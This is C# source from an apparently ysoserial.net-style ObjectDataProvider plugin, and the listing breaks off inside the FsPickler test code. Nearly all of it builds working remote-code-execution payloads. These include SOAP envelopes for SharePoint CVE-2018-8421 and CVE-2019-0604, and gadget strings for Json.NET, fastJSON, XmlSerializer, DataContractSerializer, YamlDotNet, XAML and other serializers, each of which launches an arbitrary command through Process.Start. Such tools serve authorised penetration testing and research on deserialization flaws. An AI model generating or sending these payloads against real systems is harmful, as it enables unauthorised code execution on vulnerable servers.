/// <summary>
/// Builds the SOAP request body for this plugin's CVE-2018-8421 case.
/// Reads the plugin-level fields <c>cmd</c> and <c>useurl</c>, both declared
/// outside this listing: <c>useurl</c> selects which of the two envelope
/// variants below is produced.
/// </summary>
/// <returns>
/// The complete <c>soap:Envelope</c> carrying a
/// <c>ValidateWorkflowMarkupAndCreateSupportObjects</c> call whose
/// <c>workflowMarkupText</c> CDATA wraps a <c>Rd:ResourceDictionary</c>.
/// Never null.
/// </returns>
public string CVE_2018_8421()
{
    string payload = "";
    if (useurl)
    {
        // URL form: cmd is placed verbatim into the ResourceDictionary Source
        // attribute (no attribute escaping is applied on this path).
        payload = @"<?xml version=""1.0"" encoding=""utf-8""?> <soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[ <SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow""> <Rd:ResourceDictionary xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" Source=""" + cmd + @"""/> </SequentialWorkflowActivity> ]]></workflowMarkupText> <rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>";
    }
    else
    {
        // Inline form: the command is split into FileName / Arguments by the
        // project's CommandArgSplitter in XML mode (presumably it also escapes
        // the parts for use inside attributes — confirm against that helper).
        Boolean hasArgs;
        string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);
        String cmdPart;
        if (hasArgs)
        {
            cmdPart = $@"<Diag:ProcessStartInfo FileName=""" + splittedCMD[0] + @""" Arguments=""" + splittedCMD[1] + @""">";
        }
        else
        {
            cmdPart = $@"<Diag:ProcessStartInfo FileName=""" + splittedCMD[0] + @""">";
        }
        // Detection note: both forms share the same SOAP action and the same
        // SequentialWorkflowActivity/CDATA wrapper; only the content of the
        // Rd:ResourceDictionary element differs between them.
        payload = @"<?xml version=""1.0"" encoding=""utf-8""?> <soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[ <SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow""> <Rd:ResourceDictionary xmlns:System=""clr-namespace:System;assembly=mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" xmlns:ODP=""clr-namespace:System.Windows.Data;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <ODP:ObjectDataProvider x:Key=""LaunchCmd"" MethodName=""Start""> <ObjectDataProvider.ObjectInstance><Diag:Process><Diag:Process.StartInfo>" + cmdPart + @"</Diag:ProcessStartInfo></Diag:Process.StartInfo></Diag:Process> </ObjectDataProvider.ObjectInstance> </ODP:ObjectDataProvider> </Rd:ResourceDictionary> </SequentialWorkflowActivity> ]]></workflowMarkupText> <rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>";
    }
    // minimisation of payload is not important here but we can do it if needed!
    return(payload);
}
/// <summary>
/// Builds the encoded value for this plugin's CVE-2019-0604 case from the
/// plugin-level field <c>cmd</c> (declared outside this listing). The XML body
/// is reduced with <c>PayloadMinifier</c> and then hex-encoded with
/// <c>HexEncode</c>; both helpers are defined elsewhere in this class.
/// </summary>
/// <returns>
/// A string beginning with the literal <c>__bp</c>, followed by the
/// hex-encoded single-char length prefix and the hex-encoded
/// <c>payloadPart1 + payloadPart2</c>.
/// </returns>
public string CVE_2019_0604()
{
    // Command split into FileName / Arguments by the project's CommandArgSplitter
    // (XML mode; presumably escapes the parts for XML — confirm against that helper).
    Boolean hasArgs;
    string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);
    String cmdPart;
    if (hasArgs)
    {
        cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>";
    }
    else
    {
        cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>";
    }
    // Assembly-qualified type name prefix; the trailing ':' separates it from the
    // XML body that follows.
    string payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";
    /*
     * Earlier, pretty-printed form of payloadPart2 kept for reference (uses the
     * xsi/xsd prefixes instead of the shorter a/b prefixes used below):
     *
     * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
     * <ExpandedElement/>
     * <ProjectedProperty0>
     * <MethodName>Parse</MethodName>
     * <MethodParameters>
     * <anyType xsi:type=""xsd:string"">
     * <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
     * </anyType>
     * </MethodParameters>
     * <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
     * </ProjectedProperty0>
     * </ExpandedWrapperOfXamlReaderObjectDataProvider>";
     *
     //*/
    string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
    payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding
    //Console.WriteLine(payloadPart2);
    string payload = payloadPart1 + payloadPart2;
    StringBuilder stringBuilder = new StringBuilder();
    stringBuilder.Append("__bp");
    // Length prefix: payload.Length * 4 narrowed to one char. 'checked' makes the
    // cast throw OverflowException instead of silently wrapping if the shifted
    // length does not fit in a char.
    HexEncode(checked ((char)(payload.Length << 2)), stringBuilder);
    HexEncode(payload, stringBuilder);
    return(stringBuilder.ToString());
}
/// <summary>
/// Produces the ObjectDataProvider gadget output for the requested formatter.
/// <paramref name="formatter"/> is lower-cased and compared against: xaml,
/// json.net, fastjson, javascriptserializer, xmlserializer,
/// datacontractserializer, yamldotnet, fspickler, sharpserializerbinary and
/// sharpserializerxml. The xaml and datacontractserializer branches also read
/// the generator field <c>variant_number</c>, and xaml variant 3 reads
/// <c>xaml_url</c>; both fields are declared outside this listing.
/// </summary>
/// <param name="formatter">Target serializer name (case-insensitive).</param>
/// <param name="inputArgs">
/// Command parts (<c>CmdFileName</c>, <c>CmdArguments</c>, <c>HasArguments</c>,
/// <c>Cmd</c>) plus the <c>Minify</c> and <c>Test</c> switches. Several branches
/// write back to it: <c>CmdType</c> is set per formatter and xaml variant 4 sets
/// <c>IsSTAThread</c>.
/// </param>
/// <returns>
/// A <c>string</c> for every formatter except sharpserializerbinary, which
/// returns the <c>object</c> produced by <c>SerializersHelper</c> unchanged.
/// </returns>
/// <exception cref="Exception">
/// Thrown with the message "Formatter not supported" when no branch matches.
/// </exception>
public override object Generate(string formatter, InputArgs inputArgs)
{
    // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml
    // NOTE(review): most branches compare with ToLower() (culture-sensitive), the two
    // sharpserializer branches with ToLowerInvariant(). A single
    // formatter.Equals("...", StringComparison.OrdinalIgnoreCase) would be consistent.
    if (formatter.ToLower().Equals("xaml"))
    {
        ProcessStartInfo psi = new ProcessStartInfo();
        psi.FileName = inputArgs.CmdFileName;
        if (inputArgs.HasArguments)
        {
            psi.Arguments = inputArgs.CmdArguments;
        }
        // Overwrites the private environmentVariables field with an empty
        // StringDictionary via reflection — presumably so this process's own
        // environment is not serialized into the output; confirm if it matters.
        // GetField() returns null if the framework renames the field, which would
        // surface here as a NullReferenceException.
        StringDictionary dict = new StringDictionary();
        psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
        Process p = new Process();
        p.StartInfo = psi;
        ObjectDataProvider odp = new ObjectDataProvider();
        odp.MethodName = "Start";
        // IsInitialLoadEnabled=false defers the provider's refresh so MethodName is
        // not invoked on this side while the object graph is built (WPF behaviour;
        // confirm against the ObjectDataProvider docs).
        odp.IsInitialLoadEnabled = false;
        odp.ObjectInstance = p;
        string payload = "";
        if (variant_number == 2)
        {
            ResourceDictionary myResourceDictionary = new ResourceDictionary();
            myResourceDictionary.Add("", odp);
            // XAML serializer can also be exploited!
            payload = SerializersHelper.Xaml_serialize(myResourceDictionary);
        }
        else if (variant_number == 3)
        {
            if (xaml_url == "")
            {
                // NOTE(review): exits the whole process from inside a generator;
                // throwing (e.g. ArgumentException) would let callers handle the
                // missing URL instead.
                Console.WriteLine("Url parameter was not provided.");
                Console.WriteLine("Try 'ysoserial --fullhelp' for more information.");
                System.Environment.Exit(-1);
            }
            // There are loads of other objects in Presentation that use XAML URLs and they can be used here instead
            // xaml_url is inserted verbatim into the Source attribute (no escaping here).
            payload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" Source=""" + xaml_url + @"""/>";
        }
        else if (variant_number == 4)
        {
            inputArgs.IsSTAThread = true; // we need STAThreadAttribute here
            // The serialized provider is embedded as an escaped attribute value.
            string bridge = SerializersHelper.Xaml_serialize(odp);
            if (inputArgs.Minify)
            {
                // using discardable regex array to make it shorter!
                bridge = XMLMinifier.Minify(bridge, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " });
            }
            // There are loads of other objects in Presentation that use ResourceDictionary and they can all be used here instead
            payload = @"<WorkflowDesigner xmlns=""clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"" PropertyInspectorFontAndColorData=""" + CommandArgSplitter.XmlStringAttributeEscape(bridge) + @"""/>";
        }
        else
        {
            //payload = XamlWriter.Save(odp);
            payload = SerializersHelper.Xaml_serialize(odp);
        }
        if (inputArgs.Minify)
        {
            // using discardable regex array to make it shorter!
            payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " });
        }
        // Test mode round-trips the generated payload through Xaml_deserialize in
        // this process; failures are only reported via Debugging.ShowErrors.
        if (inputArgs.Test)
        {
            if (inputArgs.IsSTAThread)
            {
                // Variant 4 set IsSTAThread above, so the round-trip runs on a
                // dedicated STA thread and this thread blocks until it finishes.
                var staThread = new System.Threading.Thread(delegate()
                {
                    try
                    {
                        SerializersHelper.Xaml_deserialize(payload);
                    }
                    catch (Exception err)
                    {
                        Debugging.ShowErrors(inputArgs, err);
                    }
                });
                staThread.SetApartmentState(System.Threading.ApartmentState.STA);
                staThread.Start();
                staThread.Join();
            }
            else
            {
                try
                {
                    SerializersHelper.Xaml_deserialize(payload);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
        }
        return(payload);
    }
    if (formatter.ToLower().Equals("json.net"))
    {
        inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
        // Command parts are wrapped in single quotes and concatenated without
        // further escaping on this path.
        string cmdPart = "";
        if (inputArgs.HasArguments)
        {
            cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'";
        }
        else
        {
            cmdPart = "'" + inputArgs.CmdFileName + "'";
        }
        String payload = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':[" + cmdPart + @"] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} }";
        if (inputArgs.Minify)
        {
            // UseSimpleType additionally lets the minifier shorten the listed
            // assembly names; otherwise only the generic minification applies.
            if (inputArgs.UseSimpleType)
            {
                payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null);
            }
            else
            {
                payload = JSONMinifier.Minify(payload, null, null);
            }
        }
        if (inputArgs.Test)
        {
            try
            {
                SerializersHelper.JsonNet_deserialize(payload);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(payload);
    }
    else if (formatter.ToLower().Equals("fastjson"))
    {
        inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
        String cmdPart;
        if (inputArgs.HasArguments)
        {
            cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @"""";
        }
        else
        {
            cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @"""";
        }
        String payload = @"{ ""$types"":{ ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"", ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"", ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3"" }, ""$type"":""1"", ""ObjectInstance"":{ ""$type"":""2"", ""StartInfo"":{ ""$type"":""3"", " + cmdPart + @" } }, ""MethodName"":""Start"" }";
        if (inputArgs.Minify)
        {
            payload = JSONMinifier.Minify(payload, null, null);
        }
        if (inputArgs.Test)
        {
            try
            {
                // Round-trips through fastJSON's static JSON.ToObject; the
                // result is discarded.
                var instance = JSON.ToObject <Object>(payload);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(payload);
    }
    else if (formatter.ToLower().Equals("javascriptserializer"))
    {
        inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
        String cmdPart;
        if (inputArgs.HasArguments)
        {
            cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'";
        }
        else
        {
            cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'";
        }
        String payload = @"{ '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'ObjectInstance':{ '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'StartInfo': { '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', " + cmdPart + @" } } }";
        if (inputArgs.Minify)
        {
            payload = JSONMinifier.Minify(payload, null, null);
        }
        if (inputArgs.Test)
        {
            try
            {
                SerializersHelper.JavaScriptSerializer_deserialize(payload);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(payload);
    }
    else if (formatter.ToLower().Equals("xmlserializer"))
    {
        inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
        String cmdPart;
        if (inputArgs.HasArguments)
        {
            cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
        }
        else
        {
            cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
        }
        // The outer <root type="..."> element is the wrapper that
        // XMLSerializer_deserialize below reads via its "root"/"type" arguments.
        // Interpolated string: "{{" / "}}" are escaped braces, so the XAML gets
        // single braces.
        String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" > <ExpandedElement/> <ProjectedProperty0> <MethodName>Parse</MethodName> <MethodParameters> <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </MethodParameters> <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProvider> </root> ";
        if (inputArgs.Minify)
        {
            payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true);
        }
        if (inputArgs.Test)
        {
            try
            {
                SerializersHelper.XMLSerializer_deserialize(payload, null, "root", "type");
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(payload);
    }
    else if (formatter.ToLower().Equals("datacontractserializer"))
    {
        inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
        String cmdPart, payload;
        if (variant_number == 2)
        {
            // Variant 2: XamlReader/ObjectDataProvider wrapper, like the
            // xmlserializer branch but with DataContract namespaces and z:Id/z:Ref.
            if (inputArgs.HasArguments)
            {
                cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
            }
            else
            {
                cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
            }
            payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> ";
        }
        else if (variant_number == 3)
        {
            // Variant 3: same document as variant 2 but with the fixed placeholder
            // "xxxxx" where the command would go; the command and cmdPart are not
            // used on this path.
            payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">xxxxx</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> ";
        }
        else
        {
            // Default variant: Process/ObjectDataProvider wrapper with the command
            // parts as b:anyType / anyType strings. Note the two cmdPart forms use
            // different element names and namespace declarations.
            if (inputArgs.HasArguments)
            {
                cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType> <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>";
            }
            else
            {
                cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>";
            }
            payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:c=""http://www.w3.org/2001/XMLSchema"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" > <ExpandedElement z:Id=""ref1"" > <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Start</a:MethodName> <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> " + cmdPart + @" </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> </root> ";
        }
        if (inputArgs.Minify)
        {
            payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
        }
        if (inputArgs.Test)
        {
            try
            {
                SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(payload);
    }
    else if (formatter.ToLower().Equals("yamldotnet"))
    {
        inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet;
        String cmdPart;
        if (inputArgs.HasArguments)
        {
            cmdPart = $@"FileName: " + inputArgs.CmdFileName + @", Arguments: " + inputArgs.CmdArguments;
        }
        else
        {
            cmdPart = $@"FileName: " + inputArgs.CmdFileName;
        }
        // YAML flow-style document with explicit "!<...>" type tags on each mapping.
        String payload = @" !<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> { MethodName: Start, ObjectInstance: !<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { StartInfo: !<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { " + cmdPart + @" } } }";
        if (inputArgs.Minify)
        {
            payload = YamlDocumentMinifier.Minify(payload);
        }
        if (inputArgs.Test)
        {
            try
            {
                SerializersHelper.YamlDotNet_deserialize(payload);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(payload);
    }
    else if (formatter.ToLower().Equals("fspickler"))
    {
        inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
        String cmdPart;
        if (inputArgs.HasArguments)
        {
            cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
        }
        else
        {
            cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
        }
        // Non-interpolated literal here, so the XAML braces are written singly; the
        // XML is then JSON-escaped and embedded as a string value in the FsPickler
        // document below.
        String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>";
        internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload);
        String payload = @"{ ""FsPickler"": ""4.0.0"", ""type"": ""System.Object"", ""value"": { ""_flags"": ""subtype"", ""subtype"": { ""Case"": ""NamedType"", ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"", ""Assembly"": { ""Name"": ""Microsoft.PowerShell.Editor"", ""Version"": ""3.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""31bf3856ad364e35"" } }, ""instance"": { ""serializationEntries"": [ { ""Name"": ""ForegroundBrush"", ""Type"": { ""Case"": ""NamedType"", ""Name"": ""System.String"", ""Assembly"": { ""Name"": ""mscorlib"", ""Version"": ""4.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""b77a5c561934e089"" } }, ""Value"": """ + internalPayload + @""" } ] } } }";
        if (inputArgs.Minify)
        {
            payload = JSONMinifier.Minify(payload, null, null);
        }
        if (inputArgs.Test)
        {
            try
            {
                var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true);
